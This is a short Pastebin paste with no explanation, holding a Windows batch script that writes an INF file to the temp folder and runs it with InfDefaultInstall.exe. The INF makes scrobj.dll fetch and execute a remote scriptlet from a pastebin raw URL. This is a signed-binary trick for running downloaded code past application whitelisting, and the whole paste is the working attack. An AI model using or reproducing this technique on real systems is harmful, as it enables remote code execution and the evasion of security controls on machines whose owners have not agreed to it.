Advertisement
rafelivgi

Untitled

Feb 28th, 2020
191
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. @echo off
  2. echo [Version]>"%temp%\my.inf"
  3. echo Signature=$CHICAGO$>>"%temp%\my.inf"
  4. echo>>"%temp%\my.inf"
  5. echo [DefaultInstall]>>"%temp%\my.inf"
  6. echo UnregisterDlls = My>>"%temp%\my.inf"
  7. echo >>"%temp%\my.inf"
  8. echo [My]>>"%temp%\my.inf"
  9. echo 11,,scrobj.dll,2,60,https://pastebin.com/raw/vr6xspN4>>"%temp%\my.inf"
  10. InfDefaultInstall.exe "%temp%\my.inf"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement